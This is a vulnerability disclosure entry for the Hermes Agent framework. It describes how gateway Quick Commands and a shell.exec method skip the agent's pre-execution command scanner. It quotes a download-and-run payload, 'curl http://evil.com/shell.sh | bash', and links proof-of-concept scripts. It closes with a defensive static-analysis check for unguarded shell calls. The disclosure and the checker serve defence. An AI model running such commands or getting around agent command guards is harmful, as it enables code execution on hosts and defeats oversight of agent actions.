| Title | NousResearch Hermes Agent 75cbdfd06bb041936f164c8d75ac518b2cb4fec0 Protection Mechanism Failure (CWE-693) |
|---|
| Description | # Technical Details
A Pre-Execution Security Scanner Bypass exists in the `command.dispatch` quick-command execution path and the `shell.exec` JSON-RPC method in `tui_gateway/server.py` and `gateway/run.py` of Hermes Agent.
The application fails to route gateway shell execution paths through the centralized `check_all_command_guards()` wrapper and the Tirith pre-execution scanner. Quick Commands execute configured shell commands directly with `subprocess.run(..., shell=True)` or `asyncio.create_subprocess_shell()`, while `shell.exec` only applies the simpler `detect_dangerous_command()` matcher and omits Tirith scanning. This bypasses defense-in-depth checks intended to block obfuscated shell payloads, Unicode attacks, homograph attacks, and dangerous pipe chains such as `curl | bash`.
# Vulnerable Code
File: `tui_gateway/server.py`
Method: `command.dispatch`
Why: The quick-command `exec` path runs configured commands with `subprocess.run(..., shell=True)` without invoking `check_all_command_guards()` or the Tirith scanner.
File: `gateway/run.py`
Method: `command.dispatch`
Why: The standard gateway quick-command `exec` path launches commands with `asyncio.create_subprocess_shell()` after only environment sanitization, leaving Tirith checks unenforced.
File: `tui_gateway/server.py`
Method: `shell.exec`
Why: The JSON-RPC shell execution method calls only `detect_dangerous_command()` before shell execution and does not invoke the centralized Tirith-backed guard path.
# Reproduction
1. Run Hermes Agent with the TUI or generic Gateway enabled and Tirith installed/enabled.
2. Download the control script from `https://gist.github.com/YLChen-007/506db0a59d1c85e177dffd166ab29f7a` and run `python3 control-agent_terminal_path.py < /dev/null`.
3. Observe that the secure agent terminal path invokes `check_all_command_guards()` and blocks dangerous commands such as `curl http://evil.com/shell.sh | bash`.
4. Download the bypass PoC from `https://gist.github.com/YLChen-007/0584ffe042773f22eea72ef83c872775`.
5. Run `python3 poc_tirith_bypass.py`.
6. Observe that the same malicious payloads execute through gateway Quick Commands or `shell.exec` without Tirith being called.
# Impact
- Security-control bypass leading to Remote Code Execution with the privileges of the Hermes Agent daemon.
- Attackers with TUI JSON-RPC access or the ability to trigger configured Quick Commands can bypass advanced command scanning.
- Successful exploitation may compromise host infrastructure, API tokens, local files, and service availability. |
|---|
| Source | ⚠️ https://gist.github.com/YLChen-007/3b11589740dcf16b152b0929e1b3d024 |
|---|
| User | Eric-a (UID 96353) |
|---|
| Submission | 02/06/2026 03h34 (1 month ago) |
|---|
| Moderation | 03/07/2026 19h07 (1 month later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 376141 [NousResearch hermes-agent up to 0.15.2 tui_gateway/server.py shell.exec Privilege Escalation] |
|---|
| Points | 20 |
|---|
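
The pattern in the description (shell-execution sinks reachable without a call to `check_all_command_guards()`) can be audited statically. The following is an added example, not code from the submission or from Hermes Agent: it assumes the guard is invoked by that bare name, and the function names in the sample source are constructed stand-ins for the three paths listed under "Vulnerable Code".

```python
import ast

GUARD = "check_all_command_guards"  # guard name taken from the description
SUBPROCESS_FUNCS = {"subprocess.run", "subprocess.Popen", "subprocess.call",
                    "subprocess.check_call", "subprocess.check_output"}

# Constructed sample source; ast.parse only needs valid syntax, not resolvable names.
SAMPLE = '''
def quick_command_exec(cmd):
    return subprocess.run(cmd, shell=True, capture_output=True)
async def gateway_quick_command(cmd, env):
    return await asyncio.create_subprocess_shell(cmd, env=env)
def shell_exec(cmd):
    if detect_dangerous_command(cmd):
        raise PermissionError(cmd)
    return subprocess.run(cmd, shell=True)
def agent_terminal(cmd):
    check_all_command_guards(cmd)
    return subprocess.run(cmd, shell=True)
'''

def _call_name(call):
    """Dotted name of a call target, e.g. 'subprocess.run' (empty if not a plain name)."""
    parts, f = [], call.func
    while isinstance(f, ast.Attribute):
        parts.append(f.attr)
        f = f.value
    if isinstance(f, ast.Name):
        parts.append(f.id)
    return ".".join(reversed(parts))

def _is_shell_sink(call):
    name = _call_name(call)
    if name.split(".")[-1] == "create_subprocess_shell":
        return True
    return name in SUBPROCESS_FUNCS and any(
        kw.arg == "shell" and isinstance(kw.value, ast.Constant) and kw.value.value is True
        for kw in call.keywords)

def unguarded_shell_calls(source, filename="<constructed>"):
    """Return sorted (function, line, sink) for shell sinks in functions that never call GUARD.
    Coarse by design: any GUARD call in the function counts; ordering is not analysed."""
    findings = []
    for fn in ast.walk(ast.parse(source, filename)):
        if not isinstance(fn, (ast.FunctionDef, ast.AsyncFunctionDef)):
            continue
        calls = [n for n in ast.walk(fn) if isinstance(n, ast.Call)]
        if any(_call_name(c).split(".")[-1] == GUARD for c in calls):
            continue
        findings += [(fn.name, c.lineno, _call_name(c)) for c in calls if _is_shell_sink(c)]
    return sorted(findings, key=lambda f: f[1])

if __name__ == "__main__":
    for func, line, sink in unguarded_shell_calls(SAMPLE):
        print(f"{func}:{line}: {sink} reached without {GUARD}()")
```

Run over a real tree as a CI check, a non-empty result is a review signal rather than proof of a bypass, since the guard may be applied by a caller.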